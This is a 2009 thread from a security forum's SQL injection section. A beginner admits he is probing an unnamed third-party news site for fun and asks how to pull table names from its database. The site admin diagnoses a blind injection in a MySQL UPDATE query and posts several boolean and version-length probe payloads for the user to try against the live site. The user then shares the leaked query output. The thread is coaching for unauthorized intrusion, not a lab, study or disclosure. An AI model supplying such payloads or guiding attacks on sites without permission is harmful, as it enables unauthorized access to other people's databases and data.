|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 57
Members: 0
Total: 57
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
little help |
|
Posted: Mon Mar 30, 2009 9:37 am |
|
|
mikmik |
Beginner |
|
|
Joined: Mar 30, 2009 |
Posts: 2 |
|
|
|
|
|
|
|
hi everyone!
I am new in sqlinjection and just 4 fun I am trying a few sql injection in a site.
the url is: http://www.some-site.com/artikull.php?id=61536
when a try to insert a simple 'or 1=1--'
I get this: UPDATE `tbl_news` SET `cnt` = `cnt` + 1 WHERE `id` = 61536 \' or 1=1 -- LIMIT 1;
Is any way how i can reveal more information from database? Like tables names etc... |
|
|
|
|
|
|
|
|
Posted: Mon Mar 30, 2009 11:52 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
It seems to be sql injection in MySql UPDATE query and single quotes are not needed.
Good news is that spcedific sql injection may be exploitable.
Bad news is that it's blind injection and not easy to exploit.
So first you need to try some tests:
Code: |
id=61536+AND+(SELECT+1)=1+
|
Code: |
id=61536+AND+(SELECT+1+UNION+ALL+SELECT+1)=1+
|
Code: |
id=61536+AND+IF(LENGTH(@@version)>1,(SELECT+1+UNION+ALL+SELECT+1),1)=1+
|
Code: |
id=61536+AND+IF(LENGTH(@@version)>100,(SELECT+1+UNION+ALL+SELECT+1),1)=1+
|
|
|
|
|
|
|
|
|
|
Posted: Tue Mar 31, 2009 9:27 am |
|
|
mikmik |
Beginner |
|
|
Joined: Mar 30, 2009 |
Posts: 2 |
|
|
|
|
|
|
|
thnx waraxe for the interest,
i tried all of them but I am still getting the same result. for example if try to inject Code: | + AND + IF(LENGTH(@@version)>100, (SELECT + 1 + UNION + ALL + SELECT + 1),1)= 1 + |
i still get:
Code: | UPDATE `gshqip_lajme` SET `lexime` = `lexime` + 1 WHERE `id` = 61604 + AND + IF(LENGTH(@@version)>100, (SELECT + 1 + UNION + ALL + SELECT + 1),1)= 1 + LIMIT 1; |
Some more code's pls
Thanx again,
mikmik |
|
|
|
|
Posted: Tue Mar 31, 2009 12:24 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
OK, try this:
Describe both responses. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|